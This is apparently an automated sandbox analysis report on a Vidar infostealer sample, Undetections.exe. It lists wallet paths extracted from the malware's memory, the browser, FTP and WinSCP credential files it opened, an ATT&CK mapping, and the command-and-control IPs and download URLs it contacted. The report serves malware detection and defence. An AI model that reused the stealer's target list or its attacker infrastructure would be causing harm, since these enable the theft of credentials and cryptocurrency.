Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: RegAsm.exe, 00000004.00000002.2138534341.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*ZN
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: 2.2.spoofer.exe.4175570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.spoofer.exe.4175570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.1756042307.0000000004175000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: spoofer.exe PID: 7592, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7652, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,4_2_69D90B40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D90D60 sqlite3_bind_parameter_name,4_2_69D90D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69D90C40 sqlite3_bind_zeroblob,4_2_69D90C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB8EA0 sqlite3_clear_bindings,4_2_69CB8EA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB60B0 listen,WSAGetLastError,4_2_69CB60B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CBC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,4_2_69CBC050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB6070 PR_Listen,4_2_69CB6070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CBC030 sqlite3_bind_parameter_count,4_2_69CBC030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB63C0 PR_Bind,4_2_69CB63C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69C422D0 sqlite3_bind_blob,4_2_69C422D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_69CB6410 bind,WSAGetLastError,4_2_69CB6410

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts511
                          Process Injection                          		1
                          Deobfuscate/Decode Files or Information                          		1
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		Logon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		1
                          Credentials in Registry                          		4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Software Packing                          		NTDS55
                          System Information Discovery                          		Distributed Component Object Model1
                          Input Capture                          		114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Timestomp                          		LSA Secrets1
                          Query Registry                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials241
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Masquerading                          		DCSync41
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                          Virtualization/Sandbox Evasion                          		Proc Filesystem12
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt511
                          Process Injection                          		/etc/passwd and /etc/shadow1
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1423660 Sample: Undetections.exe Startdate: 10/04/2024 Architecture: WINDOWS Score: 100 37 universalbeure.usite.pro 2->37 39 steamcommunity.com 2->39 41 2 other IPs or domains 2->41 55 Found malware configuration 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 Yara detected Vidar 2->59 61 9 other signatures 2->61 8 Undetections.exe 15 6 2->8         started        signatures3 process4 dnsIp5 43 google.com 172.253.115.113 GOOGLEUS United States 8->43 45 ashjghas.ucoz.net 193.109.246.100, 443, 49732, 49734 COMPUBYTE-ASRU Virgin Islands (BRITISH) 8->45 31 C:\Users\user\AppData\Roaming\...\spoofer.exe, PE32 8->31 dropped 63 Found many strings related to Crypto-Wallets (likely being stolen) 8->63 13 spoofer.exe 2 8->13         started        file6 signatures7 process8 signatures9 65 Antivirus detection for dropped file 13->65 67 Multi AV Scanner detection for dropped file 13->67 69 Machine Learning detection for dropped file 13->69 71 4 other signatures 13->71 16 RegAsm.exe 36 13->16         started        21 conhost.exe 13->21         started        process10 dnsIp11 33 95.217.212.139, 443, 49743, 49744 HETZNER-ASDE Germany 16->33 35 steamcommunity.com 104.102.129.112, 443, 49742 AKAMAI-ASUS United States 16->35 23 C:\Users\user\AppData\...\softokn3[1].dll, PE32 16->23 dropped 25 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 16->25 dropped 27 C:\Users\user\AppData\...\mozglue[1].dll, PE32 16->27 dropped 29 10 other files (6 malicious) 16->29 dropped 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 16->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->51 53 5 other signatures 16->53 file12 signatures13

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Undetections.exe31%VirustotalBrowse
                          Undetections.exe26%ReversingLabs
                          Undetections.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe100%AviraTR/AD.Nekark.gilay
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                          C:\Users\user\AppData\Roaming\Undetections\spoofer.exe61%ReversingLabsByteCode-MSIL.Trojan.Zilla

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                          http://www.carterandcone.coml0%URL Reputationsafe
                          http://www.typography.netD0%URL Reputationsafe
                          http://www.sandoll.co.kr0%URL Reputationsafe
                          http://www.sajatypeworks.com0%URL Reputationsafe
                          https://fontawesome.comhttps://fontawesome.comFont0%Avira URL Cloudsafe
                          http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttf0%Avira URL Cloudsafe
                          https://95.217.212.13903780ebd6ldb.co_0.indexeddb.leveldbata0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/0%Avira URL Cloudsafe
                          https://95.217.212.139IJK0%Avira URL Cloudsafe
                          http://foo/fonts/fa-brands-400.ttfd0%Avira URL Cloudsafe
                          http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/1%VirustotalBrowse
                          https://95.217.212.139/(0%Avira URL Cloudsafe
                          http://ashjghas.ucoz.netd0%Avira URL Cloudsafe
                          http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfd0%Avira URL Cloudsafe
                          http://www.zhongyicts.com.cn1%VirustotalBrowse
                          http://foo/bar/fonts/fa-brands-400.ttf0%Avira URL Cloudsafe
                          http://foo/fonts/fa-regular-400.ttfd0%Avira URL Cloudsafe
                          http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-regular-400.ttf0%Avira URL Cloudsafe
                          http://foo/bar/fonts/fa-brands-400.ttfd0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                          https://95.217.212.139/y0%Avira URL Cloudsafe
                          https://95.217.212.139FIJ0%Avira URL Cloudsafe
                          https://95.217.212.139/vcruntime140.dll0%Avira URL Cloudsafe
                          https://95.217.212.139FHI0%Avira URL Cloudsafe
                          https://95.217.212.139/oaming0%Avira URL Cloudsafe
                          https://discord.gg/tZZe4x6PH60%Avira URL Cloudsafe
                          https://95.217.212.139/mozglue.dllA0%Avira URL Cloudsafe
                          https://95.217.212.139/40%Avira URL Cloudsafe
                          https://95.217.212.139/:0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                          https://www.siticoneframework.com/pricing.htmlFSoftware0%Avira URL Cloudsafe
                          https://95.217.212.139/80%Avira URL Cloudsafe
                          https://discord.gg/tZZe4x6PH61%VirustotalBrowse
                          https://95.217.212.139/K0%Avira URL Cloudsafe
                          http://foo/fonts/fa-regular-400.ttf0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                          https://95.217.212.139/T0%Avira URL Cloudsafe
                          https://95.217.212.139/softokn3.dll0%Avira URL Cloudsafe
                          https://95.217.212.139/EBKJKFIEBGDGDAAECGHDH0%Avira URL Cloudsafe
                          https://95.217.212.139/nss3.dll0%Avira URL Cloudsafe
                          http://foo/bar/fonts/fa-solid-900.ttf0%Avira URL Cloudsafe
                          http://www.founder.com.cn/cn0%VirustotalBrowse
                          https://95.217.212.139/e0%Avira URL Cloudsafe
                          http://foo/bar/fonts/fa-solid-900.ttfd0%Avira URL Cloudsafe
                          http://foo/bar/fonts/fa-regular-400.ttf0%Avira URL Cloudsafe
                          http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-brands-400.ttfd0%Avira URL Cloudsafe
                          https://95.217.212.139/sqln.dll0%Avira URL Cloudsafe
                          https://www.siticoneframework.com/pricing.htmlFSoftware1%VirustotalBrowse
                          http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                          https://95.217.212.139/rPR0%Avira URL Cloudsafe
                          https://95.217.212.139/sqln.dll0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          universalbeure.usite.pro
                          		193.109.246.100
                          		truefalse
                            		high
                            google.com
                            		172.253.115.113
                            		truefalse
                              		high
                              steamcommunity.com
                              		104.102.129.112
                              		truefalse
                                		high
                                ashjghas.ucoz.net
                                		193.109.246.100
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://95.217.212.139/vcruntime140.dllfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://universalbeure.usite.pro/STLprograms/NEW/hwid.txtfalse
                                    		high
                                    https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/hwids.txtfalse
                                      		high
                                      https://95.217.212.139/softokn3.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://95.217.212.139/nss3.dllfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://95.217.212.139/sqln.dllfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://universalbeure.usite.pro/STLprograms/NEW/qwxisix/Undetections/BuildZipName.txtfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabEHCBAAAF.4.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=EHCBAAAF.4.drfalse
                                            		high
                                            https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
                                              https://95.217.212.13903780ebd6ldb.co_0.indexeddb.leveldbataRegAsm.exe, 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.fontbureau.com/designersUndetections.exe, 00000000.00000002.4108901419.0000000007072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://defaultcontainer/FontAwesome.Sharp;component/fonts/fa-solid-900.ttfUndetections.exe, 00000000.00000002.4082954500.0000000002AD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://www.siticoneframework.com/Undetections.exe, 00000000.00000002.4082954500.00000000029FA000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082954500.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Undetections.exe, 00000000.00000002.4082392228.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • 1%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engliRegAsm.exe, 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2138534341.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, 76561199662282318[1].htm.4.drfalse
                                                  		high
